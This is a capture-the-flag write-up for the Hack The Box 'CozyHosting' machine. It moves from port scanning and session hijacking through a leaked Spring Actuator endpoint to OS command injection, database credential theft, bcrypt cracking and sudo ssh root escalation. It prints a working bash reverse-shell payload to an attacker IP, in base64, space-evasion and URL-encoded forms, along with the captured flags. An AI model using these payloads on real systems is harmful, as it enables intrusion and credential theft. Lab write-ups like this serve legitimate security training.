Write-up author: jon-brandy
PORT SCANNING
┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sVC 10.10.11.230 --min-rate 1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 22:59 PDT
Nmap scan report for 10.10.11.230
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
- Based on the nmap results, the target exposes only two services: SSH (OpenSSH 8.9p1) on port 22 and an nginx web server on port 80 that redirects to the virtual host cozyhosting.htb. That name needs an /etc/hosts entry pointing at 10.10.11.230 before the web app can be browsed.
WEBAPP
- Wappalyzer shows very little (no version information).
- So I ran dirsearch to enumerate the directories and files exposed by the web app.
RESULTS
- The admin page and the actuator directory are of interest here. actuator is the Spring Boot Actuator endpoint; when its sessions endpoint is exposed, it lists the IDs of every active HTTP session. Opening actuator/sessions results in this:
- Notice there is an active session for the user kanderson (information disclosure: the endpoint leaks the raw session ID, which is all the app uses to authenticate a request).
- Let's replace the value of our own session cookie (JSESSIONID) with kanderson's session ID, then refresh the page.
RESULT
- Scrolling down, you will see an input form (hostname and username fields).
- This is the interesting part. To identify the vulnerability, let's capture the request with Burp Suite.
- Fill the hostname field with the IP of our tun0 interface and leave the username empty; we just want to see how the server responds.
IN BURPSUITE
- Notice that the server's response contains the error output of an ssh command: our form input is being placed into a shell command line that runs ssh.
- That makes it clear the vulnerability is OS command injection: shell metacharacters in the input will be interpreted by the server's shell.
- The idea is to inject a basic bash reverse shell payload:
BASH REVERSE SHELL PAYLOAD
bash -i >& /dev/tcp/10.10.16.14/1337 0>&1
ENCODE IT TO BASE64 (with -w 0 so the output is a single line; the injected command must not contain newlines)
echo "bash -i >& /dev/tcp/10.10.16.14/1337 0>&1" | base64 -w 0
RESULT
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK
- Great! Now for the final payload. We want the server to decode the base64 blob first and then execute the result, hence the command pipes it through base64 -d into bash.
- Two transport problems remain. First, the injected command must not contain literal spaces; the shell trick for that is ${IFS%??}: $IFS defaults to space, tab and newline, and the %?? strips the last two characters, so the expansion is exactly one space without ever typing one. Second, the payload travels in a URL-encoded form body, so characters such as ;, |, $, { } and especially the + inside the base64 blob (which a form decoder would otherwise turn into a space) must be percent-encoded.
- So: replace every space with ${IFS%??}, URL-encode the whole thing, start a listener on port 1337 (e.g. with netcat), and send the payload.
PAYLOAD
Original one:
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK" | base64 -d | bash;
With a leading ; to terminate the server's ssh command and ${IFS%??} in place of every space:
;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
URL-ENCODE:
%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA%2BJjEK%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D%2Dd%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B
RESULT
- At this point we can't read the user flag: the shell runs as the web application's service account, not as josh, whose home directory is the only one under /home.
- Notice there is a .jar file in the application directory; decompiling it may reveal credentials.
- Let's start Python's built-in HTTP server on the target (port 8000) and download the file to our local machine.
RESULT
- If you look closely, the download did not complete: the file is truncated.
- Not sure why, but since the Python server is listening on port 8000, browsing to the target on that port shows the directory listing:
- Let's download the jar manually from there, and verify it is complete by comparing its size (or md5sum) on both sides before decompiling.
DECOMPILING IT WITH JD-GUI
- Interesting: the decompiled jar contains a PostgreSQL credential in the application's configuration.
- Let's use it to connect with psql on the target (the database is not among the open ports in the nmap scan, so it is only reachable locally).
- Run \l to list the available databases.
- Great! Let's connect to cozyhosting: run \c cozyhosting
- To list the tables (\d lists relations, it does not dump them), run \d
DUMPING THE users TABLE
- The users table is what we want. Select everything from it:
SELECT * FROM public.users;
- Awesome! Let's crack the hashed passwords with john.
- I started cracking the first hash with john and, while waiting, identified the hash type with hashid so I could use hashcat as well.
- Because time is money 🙏🏼.
GRABBING THE HASHCAT MODE FOR BCRYPT
- The hashes are bcrypt ($2a$/$2b$ prefix, "bcrypt, Blowfish (Unix)"), which is hashcat mode 3200. bcrypt is deliberately slow, so use a wordlist rather than brute force.
- Found nothing for kanderson's hash.
- But the admin hash cracked.
- Hmm... recalling that the only home directory on the target is /home/josh, the obvious guess is password reuse: try the cracked admin password for josh.
- Turns out it is reused.
RESULT
GETTING USER FLAG
83cfd0650592f468972d63e44761211a
- Checking josh's sudo permissions (sudo -l) results in this:
- josh is allowed to run the ssh command as root.
- Searching the internet for ssh gtfobins leads to this --> https://gtfobins.github.io/gtfobins/ssh/
- The sudo entry there abuses ssh's ProxyCommand option: ssh executes the ProxyCommand as the invoking user (root under sudo) before any connection is attempted, so pointing it at a shell yields a root shell.
- Using it, we successfully gain root!
GETTING ROOT FLAG
5783572fa5559507b67cfbd6636c934e